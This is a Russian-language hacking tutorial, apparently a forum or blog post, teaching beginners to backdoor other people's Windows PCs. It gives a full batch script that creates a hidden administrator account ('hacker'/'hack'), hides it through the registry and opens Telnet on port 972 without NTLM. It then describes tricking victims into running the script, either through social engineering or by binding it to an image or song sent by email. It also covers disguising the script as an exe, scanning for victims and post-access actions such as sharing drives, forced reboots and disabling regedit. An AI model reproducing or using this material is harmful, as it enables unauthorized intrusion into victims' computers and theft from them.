Привет всем начинающим взломщикам) Вот как же меня бесит когда просят подсказать программу для взлома чего либо без навыков программирования! Ну что это за ребячество? Все равно, что писать программы на c++ не зная самого языка! Вот сегодня мы поговорим о взломе через батники и командную строку) Приступаем))
Телнет — сетевой протокол для работы в удаленной системе в терминальном режиме(т.е. режиме командной строки). Все делается «ручками», мыши отдыхают, только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал, позволяющая нам подключаться к удаленным компьютерам. Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у жертвы. Для взлома можно воспользоваться таким методом как социальная инженерия(СИ). Я думаю не надо объяснять что это такое. Если вы думаете, что СИ никак не относится к хакерству то вы ошибаетесь, этот метод в данном случае наиболее актуален. Для того, чтобы открыть телнет, жертве необходимо будет запустить созданый тобой файл, который ей можно подарить. При запуске его он пропишит нужный тебе порт, на котором будет висеть телнет, нужный логин и пасс. Его можно запросто написать на языке Bat, т.е. язык команд в GUI окне в среде Windows (режим командной строки). тело батника:
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
все это пишешь в блокноте, и сохраняем как *.bat
Теперь пояснения:
chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке.
net user SUPPORT_388945a0 /delete и net localgroup Пользователи SUPPORT_388945a0 /del — удаляют стандартную первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server.
net user hacker hack /add и net localgroup Администраторы hacker /add — не трудно догадаться, что этими командами создаётся новая учетная запись с админскими правами, где
логин: hacker
пасс: hack
Так как при создании нового админа он будет виден в welcome screen'е, отключить его можно импортировав рег файл в реестр, следующего содержания:
Содержимое conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
«hacker»=dword:00000000
Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start= auto которая меняет тип его запуска на автоматический(по дефолту disabled ). При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это палевно, поэтому советую прописывать этой командой tlntadmn config port=972 sec=-NTLM, редко используемый порт. В нашем случае это 972. Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet окончательно запустит наш бэкдор. Теперь осталась единственная проблема — как же эти 2 файла подсунуть пользователю, тем более чтобы он открыл их сам. Есть 2 способа -
1) Если вы имеете доступ к компьютеру который хотите ломануть, приходите туда с флешкой на которой эти 2 файла, отправляете хозяина сделать чайку, а сами их открываете)
2) Подсовываете на мыло предварительно объеденив их с какой нибудь картинкой или музыкой и когда пользователь открывает картинку (песню) срабатывает джойнер. Принцип джойнера такой — к картинке и\или песне подсовывается один или несколько файлов и при открытии одного, открываются и другие)) Надеюсь суть вы поняли))) Сами же джойнеры можете найти во всемирной паутине)) Хотя ладно держите прямой линк программы PE_Stapl) Пароль к архиву 123 кстати))))
Теперь проверим правильный ли синтаксис кода. Открываем командную строку, если она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код, запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так: Пуск -> Выполнить -> пишем services.msc -> Ok Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и смотришь её свойства. При необходимости в любой момент можно её отключить. Вот батник готов, и как ты видишь он слишком палевны, при его запуске вылетает консольное черное окно, говорящее о выполняемых процессах в командной строке. Но не все так плохо, тебе поможет такая прога, как QuickBatchFileCompiler. Она компилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батник превратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле. Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвы тебе осталось только подключится к телнету через указанный тобой порт. Бывает так что жертва находится в глобальной сети www у которой IP динамический, в этом случаи, зная диапазон IP его провайдера можно просканировать эту сеть на открытый наш редко используемый 972 Порт. А чтобы знать когда твой «друг» в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент. Осталось подключится. Для этого можешь выбрать стандартный виндосовский клиент который находится тут c:WINDOWSsystem32telnet.exe. Запускаешь. Пишешь: Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт] если пишет: Welcome to Microsoft Telnet Service login:_ то всё OK)) Вводишь: login: hacker password: hack Появляется надпись: *===================================================== Вас приветствует Telnet-сервер производства корпорации Майкрософт *===================================================== C:>_ Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь управлять ПК, отдавая команды… Можно к примеру расшарить диски: C:>net share disk_c=c: > nul C:>net share disk_d=d: > nul C:>net share disk_e=e: > nul перезагрузить комп: C:>shutdown -r -t 1 -c -f прописать какой-нибудь ключ реестра: C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f — который запретит доступ к нему или поднять ftp сервер и залить радмина для более удобного удаленного администрирования: C:>ftp В общем-то, здесь уже играет фантазия взломщика))) Но если природа вас обделила фантазией, то есть гугл, который поможет всем))) Как видите, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делайте выводы, чтобы защитить себя в информационном мире.
